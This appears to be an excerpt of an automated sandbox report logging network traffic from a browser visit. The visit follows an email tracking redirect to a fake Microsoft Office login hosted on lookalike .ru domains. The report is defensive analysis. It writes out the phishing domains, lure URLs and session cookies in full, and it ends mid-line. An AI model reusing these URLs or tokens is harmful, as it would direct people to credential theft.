              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: unknownHTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49724 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.29.12
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XN7tdkbw6C3m8Lv&MD=htgtz4Vy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit HTTP/1.1Host: sushishop.commander1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /nin/niit HTTP/1.1Host: galeonconstruction.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /nin/niit/ HTTP/1.1Host: galeonconstruction.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mail/inbox/ HTTP/1.1Host: microsoft-d2vkbmvzwzgf.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04
              Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: react.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04
              Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0 HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_aoxn9LgNNeyAz3OYDcN7uA2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://office.q2zg22.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/24864818/main.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
              Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; 